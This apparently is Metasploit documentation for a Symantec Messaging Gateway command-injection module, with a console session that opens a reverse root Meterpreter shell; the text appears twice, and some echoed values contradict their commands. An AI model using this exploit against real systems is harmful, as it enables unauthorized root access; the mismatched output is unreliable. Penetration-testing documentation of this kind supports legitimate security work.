documentation/modules/exploit/linux/http/symantec_messaging_gateway_exec.md

## Vulnerable Application

This module exploits the command injection vulnerability of Symantec Messaging Gateway product. An authenticated user can execute a
terminal command under the context of the web server user which is root.

backupNow.do endpoint takes several user inputs and then pass them to the internal service which is responsible for executing
operating system command. One of the user input is being passed to the service without proper validation. That cause an command
injection vulnerability. But given parameters, such a SSH ip address, port and credentials are validated before executing terminal
command. Thus, you need to configure your own SSH service and set the required parameter during module usage.

**Vulnerable Application Installation Steps**

Click on the "free trial" button at the following URL.
[https://www.symantec.com/products/messaging-security/messaging-gateway](https://www.symantec.com/products/messaging-security/messaging-gateway)

You need to complete the reqistration in order to download ISO file. License file will be delivered to your e-mail address

## Verification Steps

A successful check of the exploit will look like this:

```
msf > use exploit/linux/http/symantec_messaging_gateway_exec 
msf exploit(symantec_messaging_gateway_exec) > set RHOST 12.0.0.199
RHOST => 12.0.0.199
msf exploit(symantec_messaging_gateway_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set USERNAME admin
USERNAME => admin
msf exploit(symantec_messaging_gateway_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > set SSH_ADDRESS 12.0.0.15
SSH_ADDRESS => 127.0.0.1
msf exploit(symantec_messaging_gateway_exec) > set SSH_USERNAME root
SSH_USERNAME => root
msf exploit(symantec_messaging_gateway_exec) > set SSH_PASSWORD toor
SSH_PASSWORD => qwe123
msf exploit(symantec_messaging_gateway_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:qwe123
[*] Capturing CSRF token
[+] CSRF token is : 48f39f735f15fcaccd0aacc40b27a67bf76f2bb1
[*] Sending stage (39842 bytes) to 12.0.0.199
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.199:53018) at 2017-04-30 14:00:12 +0300

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : hacker.dev
OS              : Linux 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
```
Adding Symantec messaging gateway rce 2017-06-10 12:23:12 +03:00			`## Vulnerable Application`

			`This module exploits the command injection vulnerability of Symantec Messaging Gateway product. An authenticated user can execute a`
			`terminal command under the context of the web server user which is root.`

			`backupNow.do endpoint takes several user inputs and then pass them to the internal service which is responsible for executing`
			`operating system command. One of the user input is being passed to the service without proper validation. That cause an command`
			`injection vulnerability. But given parameters, such a SSH ip address, port and credentials are validated before executing terminal`
			`command. Thus, you need to configure your own SSH service and set the required parameter during module usage.`

			`Vulnerable Application Installation Steps`

			`Click on the "free trial" button at the following URL.`
			`[https://www.symantec.com/products/messaging-security/messaging-gateway](https://www.symantec.com/products/messaging-security/messaging-gateway)`

			`You need to complete the reqistration in order to download ISO file. License file will be delivered to your e-mail address`

			`## Verification Steps`

			`A successful check of the exploit will look like this:`

			```
			`msf > use exploit/linux/http/symantec_messaging_gateway_exec`
			`msf exploit(symantec_messaging_gateway_exec) > set RHOST 12.0.0.199`
			`RHOST => 12.0.0.199`
			`msf exploit(symantec_messaging_gateway_exec) > set LHOST 12.0.0.1`
			`LHOST => 12.0.0.1`
			`msf exploit(symantec_messaging_gateway_exec) > set USERNAME admin`
			`USERNAME => admin`
			`msf exploit(symantec_messaging_gateway_exec) > set PASSWORD qwe123`
			`PASSWORD => qwe123`
			`msf exploit(symantec_messaging_gateway_exec) > set SSH_ADDRESS 12.0.0.15`
			`SSH_ADDRESS => 127.0.0.1`
			`msf exploit(symantec_messaging_gateway_exec) > set SSH_USERNAME root`
			`SSH_USERNAME => root`
			`msf exploit(symantec_messaging_gateway_exec) > set SSH_PASSWORD toor`
			`SSH_PASSWORD => qwe123`
			`msf exploit(symantec_messaging_gateway_exec) > run`

			`[*] Started reverse TCP handler on 12.0.0.1:4444`
			`[*] Performing authentication...`
			`[+] Awesome..! Authenticated with admin:qwe123`
			`[*] Capturing CSRF token`
			`[+] CSRF token is : 48f39f735f15fcaccd0aacc40b27a67bf76f2bb1`
			`[*] Sending stage (39842 bytes) to 12.0.0.199`
			`[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.199:53018) at 2017-04-30 14:00:12 +0300`

			`meterpreter > getuid`
			`Server username: root`
			`meterpreter > sysinfo`
			`Computer : hacker.dev`
			`OS : Linux 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015`
			`Architecture : x64`
			`System Language : en_US`
			`Meterpreter : python/linux`
			`meterpreter >`
			```